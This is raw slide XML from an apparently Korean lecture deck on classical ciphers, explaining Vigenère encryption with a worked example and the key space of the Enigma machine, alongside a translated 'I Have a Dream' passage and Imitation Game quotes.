              <a:t> 작은 흑인 소년들과 흑인 소녀들이 자매이자 형제로서 백인 소년들과 백인 소녀들과 손을 잡을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>수있게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 될 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>오늘 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>언젠가는 모든 계곡이 휩싸이고 모든 산이 고양되고 모든 산이 낮아지고 거친 곳이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>평지가되고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>구불</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>구불</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 한 곳이 곧게 펴지고 주님의 영광이 드러날 것이라는 꿈이 있습니다 모든 육체는 그것을 함께 볼 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Theory/T4/Vigenere</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 암호</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>divert troops to east ridge =&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" err="1"/>
              <a:t>vstwbrlbmgzqlycscrjsbyo</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key = SKY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>같은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'o'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에 대해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'M','G','Y'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>세가지가 나온 것을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="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a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>빈도분석법으로는 해독이 불가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>평문이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 아주 길며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키의 길이를 안다고 가정했을 시 빈도분석법 가능</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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err="1"/>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>원문 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>“d”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>키워드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>“S” ) -&gt; ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>암호문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> “V” ) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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35185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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vigenere</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>비즈네르</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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navy</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4092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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>국사보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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>국사보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국사보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국사보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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vigenere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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288513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키와 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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Enigma is a highly technically designed machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The problem is, we are trying to beat this machine with humans.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>What if only other machines could beat this machine?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Sometimes someone you never even thought of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Because they do things that no one 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err="1"/>
              <a:t>에니그마는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 고도의 기술로 설계된 기계예요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>문제는 우리가 사람으로 이 기계를 이기려 하는 거죠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>만일 다른 기계만이 이 기계를 이길 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>있다면요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가끔은 생각지도 못한 누군가가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>누구도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>생각지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 못한 일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>해내니깐요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vigenere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>에니그마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>IMITATION GAME</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US"/>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68881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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vigenere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>에니그마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>자판으로 입력한 알파벳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 플러그보드와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>개의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>회전자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>반전자를 거쳐 알파벳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 암호화되어 출력됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plugboard: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="140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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>값이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 바뀌는 치환암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,  Reflector: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>암호화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>해독의 키를 같게 해주는 역할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="140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718868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/Theory/T4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vigenere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>에니그마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키의 개수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17,576</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>  *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>  *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>100,391,791,500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>가지  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>- brute force attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>은 불가능함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>회전자의 초기 위치 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>) * ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>개 회전자의 배열 순서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>) * ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>배선반</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 연결 방식 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
